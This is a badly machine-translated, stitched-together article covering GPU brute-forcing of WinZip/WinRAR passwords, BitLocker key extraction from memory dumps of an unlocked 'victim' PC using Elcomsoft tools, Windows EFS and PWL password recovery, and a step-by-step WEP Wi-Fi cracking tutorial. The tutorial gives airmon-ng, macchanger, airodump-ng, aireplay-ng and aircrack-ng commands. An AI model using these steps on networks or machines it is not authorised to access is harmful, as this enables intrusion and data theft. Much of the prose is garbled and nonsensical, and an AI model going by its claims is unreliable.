We have just an hour to try with a couple of Radeon HD 5850s ​​at CrossFire, but the results, prote, turned out to be hostile. With 2880 Stream processors, we were able to pick up close to 1.1 million passwords per second, trying to break the encryption behind the AES-128 WinZip file. Two Radeon HD 6990 video cards - this is the best choice, so you want to beat your computer to full power when you change the AES password. Alternately, with the most optimistic option, you will be able to work with your passwords up to 3 million passwords per second. What else is not enough, to break the password, which consists of eight characters, less than n_zh for r_k.

Video card Cores powered by CUDA/Stream technologies Core performance when processing shaders
GeForce GTX 460 1 GB 336 1350 MHz
GeForce GTX 570 480 1464 MHz
GeForce GTX 590 1 024 1214 MHz
Radeon HD 5850 1 440 725 MHz
Radeon HD 5970 1 600 725 MHz
Radeon HD 6990 3 072 830 MHz

A pair of GeForce GTX 570 in SLI configuration is the only choice that can be used in a gaming computer. At that hour, as you, ymovіrno, you don’t realize that it takes a trival hour to update old passwords more than seven characters long, guess what we are still talking about the most unfriendly scenario. Nevermind the password at the borders from 00 to 99, and the correct password was equal to 99. Don’t get to that, and the password is known here at the average values ​​for an hour.

Password recovery programs, such as the ones listed above, don't run a second password reset, but it's not a good strategy for password recovery. Really success will be seen, nayimovirnish, here in the middle of the joke. However, nadayuchi clock frames, with which we got stuck, we did not change the visnovki, to which we went. In our opinion, Zip 2.0 encryption is absolutely not necessary. Regardless of those who need a three-time hour, to know the password for 9 or 10 characters, singly, with it as a whole, a sprig of friends-gravity can come in.

2 x GeForce GTX 570 SLI
Direct pickup of passwords, hot pickup hour Password length 1 to 6 characters Password length 1 to 8 characters
500,000 passwords per second 18 days, 7 years 462 rocky, 116 days
45 million passwords per second 4 years, 52 hvilini 5 years, 49 days
1.5 billion passwords per second 8 whilin 56 days, 5 years

Food for the Zahistu: WinZip and WinRAR

Passwords cannot be used to decrypt encrypted files. You need to generate a key to decrypt the original password, and the same thing was said on many front sides. Axis here mi zіtknulis z "big mass" for attacks by the method of picking. Key generation takes 99% per hour of decryption, so using this hard hardware security is the only way to spend an hour on evil.

Just like the offensive programs - WinZip and WinRAR - win the transformations of SHA-1, to enter the keys, the mechanisms of the skin program are trochettes one type of one. WinZip is based on PBKDF2 (Password-Based Key Derivation Function 2.0 - Password-Based Key Derivation Function 2.0) and uses a 2002 SHA-1 transformation to generate the key. Tim is not less important for passwords, be it ever so long (up to 64 characters), and at the same time, a password of 10 characters from AES-256 encryption is just as bad as AES-128.

For comparison: the WinRAR program uses its own key derivation scheme, for example, it performs (password length *2+11)*4096 SHA-1 transformations. Why would it take more than an hour to be encrypted by WinRAR-archives with a path?

2 x GeForce GTX 570 SLI
Direct pickup of passwords, passwords per second Parallel Password Recovery Accent Password Recovery
Embossing: Zip
Encryption: AES-128
495 133 513 936
Embossing: Zip
Encryption: AES-256
496 244 513 880
Embossing: RAR is standard
Encryption: AES-128
13 904 14 605

In practice, most of the time, you will forget your own password, lower your encryption file to someone who has a lot of free time and do it harder to secure your file. Navit yakby such an intruder with the best hardware security among all available options, the maximum hour for password recognition is nine characters for an AES-128 encrypted WinZip file, but it is already moving 1,000 years. Tim is no less, your prospects for password renewal are decent, if you want to show in the wild rice what your password could be.

For example, as you remember the next information about your password with 10 ASCII characters:

  • Він starts with "e";
  • End with "a";
  • Do not take revenge on great writers;
  • New є has one sign "!";
  • Do not take revenge on the capital letters: B, C, D, Q, T, U, V, W, X, Y, Z.

So you happen to conduct a search for only a mean of 1 trillion possible passwords for a deputy of 205 trillion. It's entirely possible to set up a pair of GeForce GTX 570 video cards. Since you've already won the WinRAR archives, you may not be able to renew the password, since only the wines are not short.

Visnovok

The next day, we tried to restore the old password to the WinZip archive, and we were already surprised. We all live in the world, where the information is not so stolen, so it’s hard not to be afraid of GPGPU technologies, as our graphics processors become more and more strained.

In the past, there was no way, for the help of which you could have been able to get a password of up to 10 ASCII characters for a long period of time. Tse Bulo could be less for hardware security, splintered for prayer. The same way, having initiated the Electronic Frontier Foundation, investing in 1998. pennies from his special machine Deep Crack ("Deep Evil"). For the end of the year, about $250,000, a group of experts took the car safely, as they could look at close to 90 billion passwords per second, and more than 1800 AWT-4500 chips, which work in tandem.

We can't achieve that level of productivity on our workstation, but two GeForce GTX 570 graphics cards in SLI configurations can achieve close to 1.5 billion passwords per second, which we can rightfully use with Zip 2.0 encryptions. Price to become 1/60 of the productivity for less than 1/100 of the cost of the famous machine. Obviously, we are absolutely speechless speeches. Let's face it, Zip 2.0 encryption is outdated. Зрозуміло одне: великовагові архітектури графічних процесорів з паралельними обчисленнями продовжать дотримуватися збільшення "щільності продуктивності" за цінами, що стають все більш доступними масовому споживачеві, тому в якийсь момент ми зможемо дозволити собі пошук зі швидкістю 90 мільярдів паролів на секунду на своєму настільному комп'ютері . .

Father, what did we recognize? Nasampered, we filed for Zip 2.0 encryption. This is an outdated encryption scheme that follows tradition and the WinZip program itself prompts you to crack AES in order to prevent attacks using the brute force method.

Try the evil one for straightening - it’s already another story. Most people win passwords, such as including words, and thus passwords are subject to attacks by the password guessing method behind a dictionary, regardless of whether you win the encryption scheme. Number of words in English language is less than 1 million. However, the GeForce GTX 460 can handle as little as 150,000 passwords per second with AES encryption. If you want to add a change, then it will take more than a day to break the word lock and change the password. Why? That one, which is the word for the functional plan itself, which is one letter, for example "a".

Ideally, following such situations, you can try to protect your files:

  • Do not cite the words from the dictionary. The Oxford English Dictionary contains less than 300,000 entries, to make words look better, as they get used to the hour, to make old words. For the GeForce GTX 460, it is not difficult to know such a verbal password;
  • Try not to spell out the words, after the figures stand. Having added 1 to the end of the password, you will not need to protect it more. We still can break your password by sorting through the entire vocabulary of the English language and all combinations of numbers, in a day, having created a pair of GeForce GTX 570 video cards;
  • Unify the underlying words and simply replace the letters. The "PasswordPassword" option is only a few words, as we happen to look over. So the password is mind [email protected] not є nadіynym. Password crackers know all the usual combinations. So do not choose this way;
  • Don't win the zagalny last row on the keyboard. Add "qwerty" to the dictionary of passwords, which are not so easily reverberated. Tse other way, what should be done;
  • Don't twist the obvious number row. Possibly, 314159 is easy to remember. Still, the whole number "PI", but also the same value, as it is easy to misinterpret;
  • Uniquely identify any specific information, such as the license plate of your car, social security card number, phone number, birth date, etc. We live in the world, de rich information is known to the public. As you have a profile on social networks Facebook or Twitter, the amount of information available to a third person grows even more.

The encryption scheme for the file is good, but the password is good to protect the file. This is a weak place for a symmetrical password, de encryption key is the same, like a key for decryption. As you continue to work hard for the protection of your data, then, better than everything, you will be given the security of the PGP (Pretty Good Privacy) system or certified encryption. This option is not suitable for a successful visit, as your company is not going to switch to the PKZIP archiver. Then the password dozhina can become your main problem.

If you win the new set of ASCII characters, then we set your password strength to 94 (password reset), and we will steal the password 94 times. After adding a sprinkling of special characters, you will use the evil of your password "not to be misunderstood through the majestic calculation" for hackers, so that they can try to attack your file using the brute force method. Like 7 298 831 534 994 528 possible combinations (for a password with more than one to nine characters) - a number that is not enough to reassure you, choose a password of 10 characters, and then hackers will be able to try 6 97 choose 288 35 784 combinations.

Grunty on our tests, VI, Ymovirno, you won Shukati Neckhodnu Kombinaty Zi Shvidkіstya Trokhi more than 3 milions for a second for the ciphervannya AES, Vikoristovoi couple Radeon HD 6990. TSHED TO EXTREM 1 to 10 characters, based on AMD Stream. You can find out how you can sum up the security, but it won’t help you. In order to break the file approximately for r_k, you are guilty of significantly increasing your susilly - up to 7,397 machines, which are practicable.

A future, ymovirno, average-statistical koristuvach will be given the opportunity to gain access to such a class of computer strains with parallel charges. The next step is to become a division of the calculation. Parallel Password Recovery is working on a way to speed up the processing of GPU data for digital clients.

At the moment, it’s not that problem, you won’t sleep through the yaku at night. How to say old prislіv'ya, "there would be a bazhannya, but the possibility of being found." From that hour, as the castles appeared, the guards appeared. If you want your information to be overprotectively stolen, you need to be aware, just (or foldably) pick up the word to your castle. Axis scho robleat password recovery utilities. It's amazing that the WinZip retailers are good for us in every way. Tom Vaughan, VP of WinZip, bluntly stating, "I'm looking for password recovery tools like good kids, not bad guys. ) , broken up by "filthy lads", like pratsyuє shvidshe abo zlamuє zahist is more beautiful, lower you could ochіkuvati).

It may sound, we are selling as a greedy information, or we are trying to cause dissatisfaction among readers, but we can be sure that you remember from the price of the article that you can’t buy it in a right way for a safe program. Groups that work on encryption for spells are constantly developing faster, lower available on a commercial scale. Therefore, as you use the blindfold to secure the safety of your files, your password is subject to the following basic criteria:

  • Buti dozhinoy schonaymenshe 9 symbols;
  • Utrimuvat wanting to use one great letter;
  • Utrimuvat want to use one small letter;
  • Optionally include one special character, such as "@" or "!";
  • Utrimuvat want to use one number.

These rules give your files a chance to resist the onslaught of password crackers. Hackers may not need to check the number of samples, so that they can break the password. For that maliciously encrypted file - a whole hour more. To the very same, experts from nutritional security will understand that the right meta is to secure access to official data. If you have borrowed 50 years to break the password to the WinZip-archive, deleting information about those who sold their shares last year, then the information given will no longer be important. Create more passwords, and then you will be able to enjoy and equally protect your data, and peace of mind.

Many people use the Windows encryption function, but not everyone is concerned about the security of this method of data protection. Today, we'll talk about Bitlocker encryption and try to figure out how best to implement the protection of Windows disks.

Before speech, about those, how to build a Beatlocker, you can read in the article ““.

  • Peredmova
  • How to use Bitlocker
    • Irritability
    • Keys of inspiration
    • Breaking BitLocker
    • BitLocker To Go
  • Visnovok

The article was written for previous purposes. All information in the future may be cognizant of its nature. Vaughn is addressed to fakhivtsy for the safety of those who want to become them.

How to use Bitlocker

What is Bitlocker?

BitLocker is a fundamental function of disk encryption in Windows 7, 8, 8.1, 10 operating systems.

How to use BitLocker?

The reliability of BitLocker is not to be judged by the reputation of AES. A popular encryption standard may or may not be the mother of weak features, and its implementation in specific cryptographic products is often clarified by them. The latest BitLocker technology code is not released by Microsoft. It seems that in different versions of Windows it was based on different schemes, but the changes were not commented. More than that, the choice of 10586 Windows 10 wins just a sign, and after two builds it reappeared. Prote about everything in order.

The first version of BitLocker introduced ciphertext block chaining (CBC) mode. Even then, there were obvious shortcomings: ease of attack behind the given text, weak resistance to attacks on the kshtalt, just keep it up. To that, Microsoft immediately vyrishili zahist. Even before Vista, the Elephant Diffuser algorithm was added to the AES-CBC scheme, which makes it difficult to directly match blocks to the ciphertext. Behind him, however, instead of two sectors, after encryption with one key, a different result was given, which made it easier to calculate the cryptic pattern. However, the key itself for the victor's abbreviations was short - 128 bits. Through the administrative policies of yoga, you can keep up to 256 bits, but why does it work?

For coristuvachіv after changing the key of the call, nothing will change - neither the number of passwords to be entered, nor the subjective security of the operation. Like the most systems of full-disk encryption, BitLocker won't use the keys... and don't waste your time. The axis is important BitLocker scheme.

  • When BitLocker is activated, the main bit sequence is created behind the help of the pseudo-vibration number generator. The volume encryption key is FVEK (full volume encryption key). The very same is encrypted in the skin sector.
  • For its own sake, FVEK is encrypted with the help of another key - VMK (volume master key) - and is saved from the encrypted look in the middle of the metadata volumes.
  • The VMK itself can also be encrypted, but in other ways it can be encrypted using other methods.
  • On new motherboards, the VMK key is encrypted behind the default SRK key (storage root key), which is stored in a real cryptoprocessor - a trusted platform module (TPM). Coristuvach cannot access the TPM and is unique to the skin computer.
  • Although there is no TPM chip on the board, then the SRK replacement for encrypting the VMK key is replaced by the introduction of a PIN code or a USB-Flash-accumulator, which is connected to the power supply, with the key information previously recorded on the new one.
  • Dodatkovo to TPM or flash drives can be encrypted with a VMK key with a password.

Such a wild scheme of the BitLocker robot was taken up in the upcoming releases of Windows right up to the present hour. However, the methods for generating keys and encryption modes in BitLocker have changed. So, at the end of 2014, Microsoft quietly removed the additional Elephant Diffuser algorithm, leaving the AES-CBC scheme alone with some imperfections. At the same time, no official announcements were made about it every day. People just saw a weakened encryption technology with a huge name under the appearance of renewal. The vague explanation of this chapter was earlier than after the fact that independent pastors remembered how it was forgiven in BitLocker.

Formally, the Elephant Diffuser version was necessary for the security of Windows security under the US Federal Information Processing Standards (FIPS), prote one argument simple version: Vista and Windows 7, in which Elephant Diffuser was used, were sold without problems in America.

Another obvious reason for the use of an additive algorithm is the lack of hardware acceleration for Elephant Diffuser and the cost in security when using it. However, at many times, if the processors were more powerful, the security of the encryption ruled over something. That same AES was widely zastosovuvavsya even before there were other sets of commands and special chips for it. For a year, you can increase the hardware speed for Elephant Diffuser, or you want to give customers a choice between security and security.

Realistichnoy looking insha, unofficial version. "Elephant" having respected the spіvrobitniks, who wanted to spend less time trying to decipher the hard disk, and Microsoft wants to interact with the authorities in quiet situations, if they are not entirely legal. By the way, it confirms the theory of moving and those that, before Windows 8, the hour of the creation of the encryption keys in BitLocker, the generator of pseudo-violent numbers began to appear in Windows. For rich (yet not in the usual) editions of Windows, the Dual_EC_DRBG - “cryptographic stable PRNG”, split by the US National Security Agency and to avenge a number of mortgages in new inconsistencies.

Surprisingly, the mystery of the weakening of the encrypted encryption called out to the strong praise of criticism. Under pressure, Microsoft rewrote BitLocker, replacing new releases of Windows PRNG with CTR_DRBG. Additionally, in Windows 10 (starting from the folding of 1511), AES-XTS, immune to manipulation of ciphertext blocks, became the default encryption scheme. In the rest of the "ten" selections, BitLocker's shortfalls were used, but the main problem, like before, was gone. It’s absurd, that it’s absurd to rob stupid innovations. There are principles of key management.

The BitLocker drive decryption task is easier for those that Microsoft is actively pushing an alternative method to restore data access via the Data Recovery Agent. Sens "Agent" at tsomu, scho vin ciphering the encryption keys of all accumulative intermediaries of business with a single access key. Otrimavshi yoga, you can decipher whether the key, and therefore, whether it is a disc, which vikoristovuetsya in the same company. Handy? Yes, especially for the evil one.

The idea of ​​winning one key for all locks has already compromised itself in a big way, before it continues to turn in that other form for security. The axis is written by Ralph Leighton to tell Richard Feynman about one characteristic episode of yoga work on the Manhattan project at the Los Alamos laboratory: “... I opened three safes - and all three one combination. I’ve added the necessary: ​​I’ve added the secrets of the atomic bomb - the plutonium extraction technology, the description of the purification process, the information about those, how much the material is needed, how the bomb works, how the neutrons come out, how the bomb is fired, how the bomb is, in a word, everything, in a word, everything about what they knew at Los Alamos, the whole kitchen!

BitLocker seems to be guessing attachments of safes, descriptions in another fragment of the book “You are obviously hot, Mr. Feynman!”. The largest safe of the top-secret laboratory, which has the same volatility, which is just a wardrobe for documents. “... This is a colonel, and in the new one a richly cunning, door-door safe with large handles, like three-quarters of an inch played around the frame with a steel shear. I looked at the back side of one of the significant bronze doors and saw that the digital limb of the gates with a small lock, which looked just like the lock of my wardrobe in Los Alamos. It was obvious that the system was important to lie down in the form of that very small shear, which made a shuffle for documents. Imagining how diyalnist is, I began to turn the dial navmannya. After two hvilin - klats! - the safe opened. If the door of the safe or the top drawer of the wardrobe for documents, it is easy to know the combination. I myself have been shy, if you read my name only in order to demonstrate to you that you are unsafe.

BitLocker cryptocontainers with the power to dosit nadіyni. If you bring a flash drive encrypted with BitLocker To Go, you are unlikely to decrypt it in a good hour. However, the real scenario of using encrypted disks and virtual drives is full of inconsistencies, as it is easy to defeat BitLocker.

BitLocker spillovers

Without a doubt, you remembered that during the first activation of the Bitlocker, you will have to check for a long time. It's not surprising - the process of sector-by-sector encryption can take a little time, even to read all the terabyte HDD blocks, you don't get into it. However, the inclusion of BitLocker seems to be practically mittevo - how so?

On the right, when the Bitlocker is turned on, the data is not decrypted. All sectors will be encrypted with the FVEK key. It's just that access to which key is no longer interchangeable. All reverifications are turned on, and VMK is left with a record of middle metadata at a clear view. When the computer is switched on, the OS reads the VMK (already without re-verifying the TPM, the key is stored on the flash drive or the password), the FVEK is automatically decrypted, and then all the files in the world are downloaded to them. For a koristuvach, everything will look like a complete encryption, but respectfully, you can note a slight decrease in the firmware code of the disk subsystem. More precisely - the increase in security after the inclusion of encryption.

Tsіkavo at tsіy schemes and іnshe. Regardless of the name (re-disk encryption technology), some of the data with BitLocker is still left unencrypted. At the same time, MBR and BS appear to be missing (as the disk is not initialized in GPT), sectors and metadata are missing. Vіdkriy zavantazhuvach gives scope for fantasy. In pseudozbіynyh sectors, it’s easy to find even more small things, and metadata to revenge a lot of everything, including copies of keys. If the bitlocker is active, then the stench will be encrypted (albeit weaker, lower FVEK encrypts in multiple sectors), and if it is deactivated, it will simply lie at the open sight. Tse all potential attack vectors. Potential stench to those who, apart from them, are richly simple and universal.

Bitlocker recovery key

Crim FVEK, VMK and SRK, BitLocker has one more type of keys, "everything is wrong" creations. These are the keys to inspiration, and from some of the reasons, there is another popular attack vector. Coristuvachi are afraid to forget their password and gain access to the system, and Windows itself recommends that they make an emergency login. For which BitLocker Encryption Master at the last stage, you will need to create a recovery key. Vіdmova vіd yogo creation was not handed over. You can only choose one of the options for exporting the key, skin of any of them.

In case of locking, the key is exported as a simple text file, with the following names: "BitLocker renewal key #", where # the computer identifier is written (so, right in the file name!). The key itself may look like this.

If you forgot (because no one knew) the BitLocker password tasks, just look for the file with the recovery key. Surely, there will be savings among the documents of the in-line koristuvach or on yoga flash. It's possible to put an injunction on the sheet, as I recommend Microsoft.

To manually show the redeemable key, manually enclose the file extension (txt), the creation date (you know, if you could have turned on BitLocker approximately) and the file size (1388 bytes, so the file was not edited). If you know the key of inspiration, copy it. With it, you can somehow bypass the standard authorization in BitLocker. For which it is enough to press Esc and enter the key of renewal. You can try it without any problems and you can change your BitLocker password to a newer one, without showing the old one!

Breaking BitLocker

Real cryptographic the system - tse compromise between zruchnistyu, shvidkіstyu and nadіynistyu. They need to transfer transparent encryption procedures to decryption on the fly, methods of recovering forgotten passwords and manual work with keys. All tse weaken the system, no matter what bi-stable algorithms it was not based on. That's why it's neobov'yazkovo to shukati indulgence without middle in the Rijndael algorithm or in other schemes to the AES standard. It's much easier to know for yourself the specifics of a specific implementation.

Microsoft seems to have such "specifics" to it. For example, copies of BitLocker keys are locked up to SkyDrive and deposited in Active Directory.

Well, raptom you spend it... or Agent Smith is asleep. The client is not handily zmushuvat checks, and even the agent - more so. Z tsієї reasons for the breakup cryptographic strength AES-XTS and AES-CBC with Elephant Diffuser go to another plan, as it is recommended to increase the key length. Yakim bi dovgim vіn ne buv, the attacker easily takes yogo in unencrypted look.

Retrieving key escrow from a Microsoft or AD public record is the main way to get BitLocker. If the coristuvach does not register the appearance with the Microsoft cloud, and if the computer is not in the domain, then all the same there are ways to retrieve the encryption keys. Under the hour of extraordinary work, their hard copies are always saved in the operational memory (otherwise there would be no “clear encryption”). Tse means that they are available in the dump and file of deep sleep.

Why do the stench go up there?

How not funny - for the sake of clarity. BitLocker has been developed for offline attacks. The stench is always accompanied by re-attachment and connection of the disk to another OS, which will lead to the cleaning of the operative memory. However, after locking the OS, it dumps the operational memory dump in case of a failed crash (which can be provoked) and records the entire file of deep sleep during skin transition of the computer to deep sleep. Therefore, since Windows has recently activated BitLocker, there is a good chance to take a copy of the VMK key from the decrypted person, and then to help decrypt the FVEK and then the data itself in English.

Is it correct? All the above described methods for the malicious BitLocker were selected in one program - Forensic Disk Decryptor, distributed by the Elcomsoft company. It will automatically extract the encryption keys and mount encrypted volumes like virtual disks, decrypting them on the fly.

There is one more non-trivial way to implement key-attack in EFDD through the FireWire port, which will help you to do it, if it is not possible to run your software on the computer that is being attacked. We will install the EFDD program itself on your computer, and we will try to manage with the minimum necessary actions.

For example, just run a test system with active BitLocker and "invariably" dump memory. This is how we simulate the situation, if a colleague is viyshov on an obid and not blocking his computer. Run RAM Capture and less than the minimum for the amount of time we will take the latest dump of the file with extensions.mem and size, which confirms the extent of the operational memory installed on the victim's computer.

Chim robiti dump - for the great rahunka, without retail. Separately, if you expand it, you will create a binary file, which will automatically analyze EFDD in searches for keys.

Write a dump to a USB flash drive or transfer it as soon as possible, after which you sit at your computer and start EFDD.

We select the option "Learn keys" and how to enter the keys to the file with a memory dump.

BitLocker is a typical cryptocontainer, like PGP Disk or TrueCrypt. Containers were supposed to be filled with them on their own, and client programs for working with them under Windows should be deleted with encryption keys in the operative memory. Therefore, a universal attack scenario has been implemented in EFDD. The program automatically searches for encryption keys from all three types of popular cryptocontainers. To that it is possible to deprive all points of significance - by raptom the sacrifice is hidden vikoristovuє or PGP!

In a few seconds, Elcomsoft Forensic Disk Decryptor shows you all the keys found in your window. For transparency, you can save the file - you don't need it later.

Now BitLocker is no longer a problem! You can carry out a classic offline attack - for example, pull up a hard disk and copy yoga together. For someone, just connect it to your computer and run EFDD in the "decrypt or mount disk" mode.

After entering the path to the files with the saved EFDD keys on your choice, you can decipher the volume or decipher it as a virtual disk. At times, the files are decrypted from the world before them. For any variant of the day, changes to the original one cannot be made, so that the next day you can turn it into something like no other. The work with EFDD is obscured and only with copies of data, and to that it becomes obsolete.

BitLocker To Go

Starting from "sims" in Windows, it became possible to encrypt flash drives, USB-HDDs and other foreign ones. The technology, which I will call BitLocker To Go, encrypts stored storage just like local drives. Encryption is enabled by selecting the option in the "Explorer" context menu.

For new accumulators, it is possible to encrypt only the occupied area - all the same, fill the space with zeros and add nothing there. If you have already accumulated vicorists, then it is recommended to enable encryption on a new level. Otherwise, the place, known as vile, will be left unencrypted. It can take revenge on someone who looks like you have recently deleted files that have not yet been overwritten.

Navitke ciphering only the occupied region borrows from a few times to a few years. It's time to keep up with data commitment, throughput capacity of the interface, accumulating characteristics and cryptographic processing speed. Shards of encryption are accompanied by compression;

When an encrypted flash drive is connected to any computer running Windows 7 and beyond, the BitLocker master will automatically be called to unlock the drive. At "Providnik" until unlocked, it will appear like a disk, closed to the lock.

Here you can hack as already looked at options for bypassing BitLocker (for example, search for the VMK key from a memory dump or a deep sleep file), as well as new ones, related to wakeup keys.

If you don’t know the password, but if you manage to know one of the keys (I’ll do it manually or for the help of EFDD), then there are two main options to access the encrypted flash drive:

  • vikoristovuvat vbudovaniya BitLocker master for non-intermediate work with a flash drive;
  • hacking EFDD to re-decrypt the flash drive and create a sector-by-sector image.

The first option allows you to gain access to flash files, copy or change them, and also write your own. Another option is to victoriously dove (vіd pіvgodini), prote maє perevagi. Deciphering the sector-by-sector image allows you to further develop a more subtle analysis of the file system on the level of the forensic laboratory. If so, the flash drive itself is no longer needed and can be rotated without change.

You can open an image once again in any program that supports the IMA format, or convert it to another format (for example, UltraISO).

As you can imagine, since BitLocker2Go's authentication key has been revealed, EFDD supports other methods to bypass BitLocker. Just sort through all the available options for sleep, the docks will not know the key to any type. Others (up to FVEK) will themselves be decrypted in English, and you will deny access to the disk again.

Visnovok

BitLocker disk-based encryption technology is supported by different versions of Windows. If adequately adjusted, it allows the creation of cryptocontainers, which theoretically can be compared with TrueCrypt or PGP for security. However, in Windows, a mechanism for working with keys to create new algorithmic tricks. Zocrema, the VMK key, which is used to decrypt the main BitLocker key, is used for the help of EFDD in a few seconds from a deposited duplicate, a memory dump, a hibernation file, or an attack on a FireWire port.

Otrimavshi key, you can vikonat classic offline attack, copy and paste automatically decrypt all the data on the "protected" disk. That's why BitLocker can win more than once with other security features: Encrypted File System (EFS), Rights Management Service (RMS), program launch control, control of the installation and connection of devices, as well as harsh local policies and massive security attacks.

At the statistic quotation material for the site:

For the malicious Encrypted File System (EFS), you can use the Advanced EFS Data Recovery software developed by Elcomsoft. A demo version of this software can be viewed at http://www.elcomsoft.com/aefsdr.html

Program starter

Figure 3. Advanced EFS Data Recovery window

The program can decrypt encrypted files, but only the encryption keys (not all, but wanting some of them) are still used in the system and have not been changed.

For files encrypted in the Windows 2000 operating system, if the Cloud Record Data Base Key (SYSKEY) is saved on a floppy disk, or if the "Password Startup" option is enabled, you must know one of the following passwords in order to zoom in to decrypt the files:

    startup password or floppy disk startup

    Koristuvach password, which encrypts files

    Renewal Agent password (if possible)

Like a computer in a part of the domain, if the files are encrypted, it is not possible to decrypt the files in some way. As the password of the koristuvach (which encrypts the files), it can be changed after the coding, it is possible, it is necessary to enter the old password for the program.

Windows 9x Password Breaker

However, don’t forget that there is a richly simple way to hack passwords. Since the majority of organizations today have the OS of the client machine ¾ Windows 95/98, then, probably, it’s easier to organize the evil password protection given to the OS, even if the password for such a file is saved only in the upper register (great l prosters), you know better choose the required password for the merezhі.

For the evil passwords of Windows 95/98, there are a large number of programs, but we rely on the most popular of them PwlTool 6.0, on the basis of which research was carried out.

On little 3, the main working program was introduced, which is recognized for working on computers with Windows 95/98, Windows NT/2000.

PwlTool - a set of tools for password recovery. The main program is RePwl. This program allows you to change or forget passwords for Windows 95 (open version and OSR2) and Windows 98. It also allows you to look over passwords, save them in PWL files.

What is a pwl file?

Windows 95/98 save password for PWL files. PWL files can be found in the Windows directory. These names are saved as USERNAME.PWL. PWL file of encryptions and don't just extract new passwords. The first encryption algorithm of the Windows 95 version is such that it allows the creation of programs for decrypting PWL files. However, the version of OSR2 does not have much of a problem.

Estimation of reliability of pwl files.

OSR2's password protection system is professionally and trustworthy in terms of cryptography. However, regardless of the price, to take revenge on a few serious shortcomings, but to yourself:

    all passwords are changed to uppercase, significantly changing the number of possible passwords;

    MD5 and RC4 algorithms, which are used for encryption, allow more secure password encryption, but a valid Windows password is responsible for up to nine characters.

The password cache system is currently unreliable. The password can only be saved, as it is necessary for non-violation personnel cannot get to the computer.

How to break wifi? Some of us feel that it is not possible to choose WEP encryption at any time during the installation of a Wi-Fi access point, the shells are easily hacked. Without a doubt, the loners tried to work on their own, and approximately the stylists know how to really look. Below are descriptions of the options for an evil point with such an encryption protocol, so that you can more clearly see how real the situation is, if you can connect to your super secret point, and that’s like evil. Naturally, it is not possible to stop this way on someone else's router. The Danish material is of an exclusively recognizable nature and calls to the conclusion of the encryption protocols, which are easily hacked.

For an evil villain to need:

  • a valid Wi-Fi adapter with the possibility of injecting packets (for example, Alfa AWUS036H)
  • BackTrack Live CD
  • Well, your Wi-Fi hotspot is WEP encrypted, so experiment is being done
  • patience

After launching the command line BackTrack under the name Konsole, it is necessary to enter the following command:

Check out your mesh interface, which is called "ra0" or something like that. Remember this name. Nadalі vіn will be designated as (interface), and you will replace it with your name. Dali entered sequentially 4 rows:

airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)

Now we have fake MAC addresses. Input:

airodump-ng (interface)

A list of available dartless merging will appear. As soon as the list needs a line, you can press Ctrl + C to start the search. It is necessary to copy the BSSID of the merezhі and memorize the channel (CH column). Also change what WEP itself is designated in the ENC clause.

Now we begin to collect information from the network:

airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

channel - the name of the channel for CH, file name - the name of the file in which everything will be written, and bssid - the name of the merge.

Please try something similar to what is shown on the screenshot. Fill it all the way. Open new window Konsole and enter:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

essid - SSID of the victim.

Check for the appearance of the notification "Association successful".

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

Now you need to show all your patience and check until the number in the #Data column goes over the 10000 sign.

If you have reached the necessary number of selected data, you must enter the third window of Konsole and enter:

aircrack-ng-b (bssid) (file name-01.cap)

How im'ya be entered by you before the file name.

If you succeed, you will roll the “KEY FOUND” row, in which the key will reach the border.